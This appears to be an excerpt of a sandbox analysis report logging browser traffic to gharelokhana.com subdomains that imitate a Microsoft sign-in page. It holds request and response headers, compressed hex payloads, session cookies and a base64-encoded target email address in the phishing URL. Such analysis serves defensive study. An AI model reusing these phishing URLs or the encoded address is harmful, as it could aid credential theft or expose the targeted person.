                                                                                                                                                                                                2024-12-05 07:24:39 UTC15634INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 4c cf 2e b0 5c 4e ac 80 a7 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 7f 88 71 12 57 a6 7e 9c 40 a1 91 98 86 8f 95 2a 54 17 79 95 53 37 4a 9e 2a 87 a7 66 1d ea 17 50 9b 7f eb 07 50 7a 1c ce 9e e0 f9 2e a9 04 61 e2 8f 45 c5 0d 3c aa 6d 0a 2f 41 2c 2a f3 c0 13 51 e5 f1 ce 1f df 55 8e fd 71 14 c6 e1 24 a9 44 62 2c
                                                                                                                                                                                                Data Ascii: m[80OL;waL.\Nhr~=,JUT~l?y2X9|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDeqW~@*TyS7J*fPPz.aE<m/A,*QUq$Db,
                                                                                                                                                                                                2024-12-05 07:24:39 UTC16384INData Raw: ca 2b 2d 36 78 36 c7 ed 3d 78 0b 56 4e e7 38 13 78 f6 0e 69 1c f8 80 67 fd 9e 89 07 a1 ce c1 58 b1 43 84 fa 9b d6 21 37 9c 70 20 33 ef 1c c1 a1 4d 5f 7a 93 44 69 af b4 b9 0e 0f 4b 9a c3 b0 1c 89 5b 9c 5a b7 34 50 8e 20 7e 62 b4 7c 88 78 cb 56 8a 87 0f f9 ab 88 6c e3 6f 1f 7b 1f f7 3e ee 1a 79 a5 8a e7 2d ee e6 10 ca 4f a5 71 68 1b b1 f6 06 5c 00 55 fa 2a eb 3e 7b e1 79 3a c1 d3 a8 24 1d 80 48 57 61 38 a9 e6 a7 e6 65 18 05 f4 fb d2 3d bd 20 95 b4 2f 60 73 85 87 5c 6e ed 7f 18 9c 21 14 c7 6f 93 48 51 93 50 aa 1b 82 b2 c6 6d 96 c2 7d bb 91 c9 f4 ed 26 f9 71 e8 d4 18 ea 2c f0 46 e4 f2 8e 4d 4d 6c db 86 c8 5e d8 32 b2 e9 78 23 c3 22 c1 68 e0 65 4e c6 ca 13 66 83 6a 0b 2f a4 a3 c3 a8 2e 02 30 48 3c 18 91 fe 37 3c f6 03 60 07 60 1d ff c1 a4 9e 3b 60 54 5c 1a 74
                                                                                                                                                                                                Data Ascii: +-6x6=xVN8xigXC!7p 3M_zDiK[Z4P ~b|xVlo{>y-Oqh\U*>{y:$HWa8e= /`s\n!oHQPm}&q,FMMl^2x#"heNfj/.0H<7<``;`T\t
                                                                                                                                                                                                2024-12-05 07:24:40 UTC16384INData Raw: ae 13 c5 39 2b 11 ce 04 71 04 79 45 7d 81 20 b9 52 38 40 78 ac de b0 96 ca f2 2a d0 14 d5 6a 30 5f ab 6e 29 97 a9 6b ce b7 0b a1 f1 63 d4 4e 0f 9d 37 a1 cd 5f b5 0d 32 9a cb 69 46 c2 1b 6d 83 62 5a 04 7f 49 a6 7d 95 4c 89 c0 68 b3 7c 79 ee 87 96 e4 40 b1 9a 1b b4 f1 9f b4 a1 40 d4 c2 cf 20 02 fb c5 1c 7b c1 5a 22 92 aa 59 05 b2 f2 88 33 d1 f9 e8 75 ef e2 f4 e7 27 f8 d1 7f ca 08 1d 07 31 5c b2 9e 9a 66 49 f9 27 1d 6a d2 cd 2b 2d d2 5a 4b f4 66 3f bc 0a e2 6d 2c d3 00 87 67 a2 36 0f 80 3a 17 68 1d 00 32 87 04 38 aa 5e e2 a4 f2 b1 1e 6b 7f dd 15 32 3e 06 c5 5c f6 da 3b f5 1e 6f b5 ba b3 d5 62 53 6d 04 36 43 ed ee 30 83 1a 9d 2b ce b7 57 fc ab 6e c3 70 cd 47 f3 e3 6e 9d 1d cb db 70 b4 92 4a ec 15 5a ea 5a 64 e3 64 d7 16 31 15 3b 5a 35 d2 2f 24 be c1 ba 94 ea
                                                                                                                                                                                                Data Ascii: 9+qyE} R8@x*j0_n)kcN7_2iFmbZI}Lh|y@@ {Z"Y3u'1\fI'j+-ZKf?m,g6:h28^k2>\;obSm6C0+WnpGnpJZZdd1;Z5/$
                                                                                                                                                                                                2024-12-05 07:24:40 UTC1532INData Raw: db bd dd f8 4f 7b df ee 7f 37 7b f0 a7 ef bf fd 93 43 ac 54 4a e7 6a 4d 6c 54 4e 04 bf 24 16 aa 20 0e 8a 58 83 59 b4 47 ac 12 9f bb 87 f2 e7 40 fe 3c eb 38 f3 7e 32 4e 26 95 40 82 23 77 a4 b6 ef 48 8a aa 9c 73 38 02 2b 31 cf d3 25 32 6d e0 52 d3 a2 17 09 5c 73 70 07 30 7b 34 36 ec 22 22 80 6a 13 ce c1 c6 a9 18 41 b1 1d 09 da 78 23 29 c6 c4 8b 0e fc 26 49 c0 8e 89 dd c0 b5 07 3a d8 38 44 b8 f4 74 9e 66 97 69 32 52 ba 2b f6 e2 92 6f 8c 9c 71 e6 a9 dc 73 97 47 e5 f1 44 69 2b f1 db df 42 5b 2a b7 30 ed 67 25 2a eb ba 36 d6 51 fe a6 15 0b 05 02 99 b5 83 29 94 83 8b 1a 14 12 c5 9b f1 08 c7 e3 99 8f c1 08 53 62 fe e1 c4 20 21 1e 62 4c 8b 6a cf a7 b6 59 e3 77 4c 93 d7 ee ee 61 ca b1 47 c3 bd 75 95 de 57 6e 80 5b c4 81 02 07 77 fd 7e c9 4e 50 c6 05 60 28 16 56 8b
                                                                                                                                                                                                Data Ascii: O{7{CTJjMlTN$ XYG@<8~2N&@#wHs8+1%2mR\sp0{46""jAx#)&I:8Dtfi2R+oqsGDi+B[*0g%*6Q)Sb !bLjYwLaGuWn[w~NP`(V


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                10192.168.2.849746164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:41 UTC680OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                Sec-WebSocket-Key: cAtyGZPXWa2iYTHSEyGLWA==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:24:42 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:42 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 50c1e8d7-743b-4097-84d4-ab0eb0d40300
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - SEC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:24:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                11192.168.2.849748164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:41 UTC1153OUTGET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=true HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                                                                                                                                                                2024-12-05 07:24:43 UTC781INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:42 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Content-Length: 63017
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: no-store, no-cache
                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 5890c406-d28b-4804-bcef-ec3fee952c00
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - FRC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:24:43 UTC15603INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd 59 7b ea 58 b2 28 f8 9e bf 82 4d 67 19 28 03 66 1e ec 4d fa 60 c0 18 1b 30 66 f0 58 6e 5f 21 2d 40 46 48 58 12 c6 78 6f f3 76 7f c9 7d e8 ef 3c f4 5b ff 83 fa 63 1d 11 6b 69 00 db 3b 87 ca 73 4e 9f be 99 5f d5 b6 d6 1c 2b 56 cc 2b 24 be 7e a9 9e 57 fa 37 9d 5a 60 62 cf b4 5f 7e fa 8a 7f 02 b2 26 59 56 29 18 0c 28 aa 59 0a 6a b6 19 0c 68 92 3e 2e 05 99 1e fc e5 a7 c0 d7 09 93 14 f8 1b f8 6a ab b6 c6 f0 29 d0 53 c7 7a 40 d5 03 b6 11 58 19 0b 33 20 c9 b2 b1 d0 6d ec b4 e7 f6 fa 3a 63 b6 14 90 0d dd 66 ba 5d 0a da ec c5 de c3 05 0f 02 f2 44 32 2d 66 97 16 f6 28 56 08 02 30 f6 3c c6 9e 16 ea 73 29 58 e1 dd 63 fd d5 9c 05 f7 3e 98 a6 51 2b 31 65 cc 36 47 5d c7 06 e5 58 c5 98 cd 25 5b 1d 6a 1f 0f 5c aa 8a 3d 29 29 ec 59 95 59
                                                                                                                                                                                                Data Ascii: Y{X(Mg(fM`0fXn_!-@FHXxov}<[cki;sN_+V+$~W7Z`b_~&YV)(Yjh>.j)Sz@X3 m:cf]D2-f(V0<s)Xc>Q+1e6G]X%[j\=))YY
                                                                                                                                                                                                2024-12-05 07:24:43 UTC14460INData Raw: 30 55 92 5b d8 4f c9 9c 6a 37 68 b5 92 fc 00 2c 1f 4c a9 52 85 de 59 ab a4 68 8a 1c 0a c8 90 3d ae 9f dd 86 22 ae 18 41 00 5d 4a 1e f8 29 b9 ca 07 ca 09 47 f4 04 1c a1 d5 0b fb 70 1e 65 43 b1 5e ba 54 49 45 59 27 ca 6e 85 0a 68 e3 19 24 0f a0 cc 56 77 95 34 21 17 14 54 d8 e8 86 d9 30 ea 50 82 f7 e0 cd 7a 01 27 d9 29 21 5d 0f a1 00 93 86 d9 6d 84 04 27 a0 e1 f6 10 4a 77 a1 85 8e 99 d8 60 3f 0e 19 f2 88 b7 6c 07 38 c7 d7 02 f0 45 f6 39 2c 40 0f 38 41 1b ef 07 6e 05 44 a9 42 64 6b b4 0f 52 1c 0b 63 c4 91 15 46 9f 9f 58 66 f3 c4 72 52 e1 47 62 a6 92 f9 5c cc 54 b2 a5 4a e6 37 8b c9 4a 16 4d c2 84 2b 26 c1 6c 1c 7e 0a 64 6e 8b ac b2 8a 4f a0 2b 99 84 8f ad 87 69 2c 4d 7d e0 5d bd bf 8e a7 d3 07 94 09 a9 75 8b fc cf 30 b3 a4 5d 42 08 6f c9 12 15 cc de 16 1b f9
                                                                                                                                                                                                Data Ascii: 0U[Oj7h,LRYh="A]J)GpeC^TIEY'nh$Vw4!T0Pz')!]m'Jw`?l8E9,@8AnDBdkRcFXfrRGb\TJ7JM+&l~dnO+i,M}]u0]Bo
                                                                                                                                                                                                2024-12-05 07:24:43 UTC16384INData Raw: a0 eb 65 f7 1a 03 d0 4f df fd 2f b3 47 28 f2 bb 92 88 93 1a c8 89 26 6f a7 4d ce b0 46 17 60 db 7e 58 f8 f4 74 35 75 3b 5c 66 fc 2d 78 37 b2 e1 16 27 df 08 4b 23 72 62 27 73 e0 ca 21 3a fb 5e 89 c4 87 58 65 00 47 de 04 76 89 b9 d6 e4 2f 12 87 86 2b f5 a9 cf 4a 62 64 c9 c3 f4 6b e0 b2 56 49 e8 e5 79 48 6b 29 44 6a 2d 60 31 68 28 e6 4f ed 60 92 cd 1f 4e d2 f9 bc f3 99 82 36 90 bc 3c 8c b2 ef d2 fc 9e 3a 65 d6 83 df 7f 0f d6 b3 81 14 6d 57 42 e3 00 5b d9 dc 5b bd 8d f3 ce f0 9e 07 63 97 3c 1a cc c4 b1 2a ee ce f5 84 d2 b0 cd a3 6f 56 9d 65 32 27 a0 b0 b3 29 99 13 9c 32 89 9a 3f 2f 5c 62 79 8f 61 8c 52 23 4b 1f b1 1f 36 a3 67 90 d6 34 84 62 ad c9 4e c4 73 f2 9c 1e bd d5 bc b3 89 4a 79 a9 a6 5b cd f4 e3 7f 90 95 f8 9a 50 f9 4d ba 89 92 84 20 00 be 29 7c 49 3e
                                                                                                                                                                                                Data Ascii: eO/G(&oMF`~Xt5u;\f-x7'K#rb's!:^XeGv/+JbdkVIyHk)Dj-`1h(O`N6<:emWB[[c<*oVe2')2?/\byaR#K6g4bNsJy[PM )|I>
                                                                                                                                                                                                2024-12-05 07:24:43 UTC16384INData Raw: a0 93 d6 3a 4f 27 4e f4 28 68 8d df 5d 5c 3d 7c 82 e4 06 d7 6a 4a e0 aa 24 34 1f 78 10 62 9b ab 4a d0 72 fb a3 7a 8a d2 5a 90 28 62 c0 6e db b7 f0 80 ae 54 0b a8 f3 3c be 7d dc 57 0f 20 9b ce ed bc a4 23 ce e4 87 3e ce 4b ba 40 ce ff eb 76 7a bd be ce a9 9f b8 22 c3 8b f1 d4 cc 4d 77 82 be bb 34 b1 27 bf 98 d8 93 a5 89 5d fa bc 1b 10 a4 9f 8a f5 60 93 0d 53 1b 97 85 2e 61 93 72 3c 01 d0 92 05 c7 9c 7f c9 1e ef fb 2d 97 a2 cb 0b 4d ca b2 f2 4b 39 00 2b dc 10 4d 7e 87 7f 15 41 0a c8 1d 27 f4 1f 59 13 96 fc bd b8 1a 94 84 39 7f 2f 39 02 ac 1b 55 e8 04 ba 7b 71 a4 c7 3a a0 53 4f cd 69 21 b4 ec a4 62 14 c3 1c 7d d1 9e 54 cc 99 4e f4 c9 0d cc 91 f8 a0 c9 66 3c a9 20 4c 45 73 57 ea 9d 37 cd 9b d1 17 50 34 87 92 42 88 37 90 26 5c 27 05 84 6b cb 83 ab 7a f1 62 02
                                                                                                                                                                                                Data Ascii: :O'N(h]\=|jJ$4xbJrzZ(bnT<}W #>K@vz"Mw4']`S.ar<-MK9+M~A'Y9/9U{q:SOi!b}TNf< LEsW7P4B7&\'kzb
                                                                                                                                                                                                2024-12-05 07:24:43 UTC186INData Raw: 40 a5 fa 58 a3 5b 1c ac f7 fb 67 c1 db 26 52 c0 a6 1f b4 9a 18 57 fb d4 e9 bb a8 f0 87 c2 0a 06 5d c1 d8 cf 45 19 ff b6 78 1f 38 03 33 02 e1 43 9e c6 cb fd 0f 1e 3f b5 be 94 51 24 36 07 fa 9b 3a 1e 52 b5 82 7a 54 95 21 2c cc 3e 14 04 a8 0f 00 ea 73 73 83 af 20 2f d7 41 3e 9e cb 99 18 f4 02 61 1e 05 40 3d 3d 63 be 3f 9f e3 48 df 5f c4 0e e7 17 17 00 3a ef 42 77 42 0c 08 d6 ea cf ab 0f 3c b4 76 45 fe 58 f5 d2 f2 65 d6 31 e3 3b fb 19 fd 3f 1c c9 3f fe db 43 f9 20 ec ff eb af db db af e9 35 80 38 f0 f5 1f b0 16 a2 d1 f0 eb 3f fe 17 ca 03 a7 95 2a aa 02 00
                                                                                                                                                                                                Data Ascii: @X[g&RW]Ex83C?Q$6:RzT!,>ss /A>a@==c?H_:BwB<vEXe1;??C 58?*


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                12192.168.2.849747164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:41 UTC870OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:42 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:42 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 73783743-244d-455c-b441-0047e8dbb100
                                                                                                                                                                                                x-ms-ests-server: 2.1.19568.3 - SEC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:24:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                13192.168.2.849750164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:41 UTC544OUTGET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                                                                                                                                                                Host: e7a91062-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:42 UTC745INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:42 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 49934
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                age: 5462869
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                etag: 0x8DCE31CBE97473C
                                                                                                                                                                                                last-modified: Wed, 02 Oct 2024 19:59:37 GMT
                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                x-cache: HIT
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-request-id: 9ba7681e-c01e-00c4-7737-1521f7000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:42 UTC13689INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 4c cf 2e b0 5c 4e ac 80 a7 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 7f 88 71 12 57 a6 7e 9c 40 a1 91 98 86 8f 95 2a 54 17 79 95 53 37 4a 9e 2a 87 a7 66 1d ea 17 50 9b 7f eb 07 50 7a 1c ce 9e e0 f9 2e a9 04 61 e2 8f 45 c5 0d 3c aa 6d 0a 2f 41 2c 2a f3 c0 13 51 e5 f1 ce 1f df 55 8e fd 71 14 c6 e1 24 a9 44 62 2c
                                                                                                                                                                                                Data Ascii: m[80OL;waL.\Nhr~=,JUT~l?y2X9|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDeqW~@*TyS7J*fPPz.aE<m/A,*QUq$Db,
                                                                                                                                                                                                2024-12-05 07:24:42 UTC16384INData Raw: c9 56 49 df dc ab 54 aa d2 d2 07 73 3c c4 80 34 30 8e ee 35 5e cf 5f 8d b5 8b 00 e4 e8 f8 8e 19 f3 07 80 ca 6b 8a c2 07 df 43 e2 9a 4f 3d 54 ab 59 46 95 57 58 0e cb f5 b6 be b8 4f 60 c6 bf 0a 4d 66 fe 5f 00 86 a9 f8 47 6a fc a1 9a 4a 3f 7b 12 a6 b1 17 f2 3e a5 f2 e6 2d c1 15 5a 56 52 cf 5f 2a ff 05 97 c0 f6 59 ab 12 34 6d be 9a 8d 14 37 0e 23 5c 7e c3 25 33 43 7f 03 1d cc 4d ee 10 38 4d b5 8d a5 a4 0c 2a a5 b7 0c 2a 4d ca a0 06 53 2f cb 87 17 29 7a 71 1d 36 53 b8 96 92 b2 f2 fb fc d9 0f f3 4c 4b 53 e7 f1 1b df 87 c9 ea 61 7c 60 20 36 e7 e0 44 fa 74 86 14 ae d7 f4 1a 54 ca ad 2a f2 d8 c8 bf 4b a5 09 e6 cc 6c d0 a0 6b 4b 69 2b 28 6a 79 24 7f 08 2c fb 6a ba 76 14 cf a7 49 f6 e1 5c 72 06 7d 20 02 9a 72 f2 ef 59 3e 59 3b 1c ae a2 41 e9 a9 05 4a cc 90 c6 0b d4
                                                                                                                                                                                                Data Ascii: VITs<405^_kCO=TYFWXO`Mf_GjJ?{>-ZVR_*Y4m7#\~%3CM8M**MS/)zq6SLKSa|` 6DtT*KlkKi+(jy$,jvI\r} rY>Y;AJ
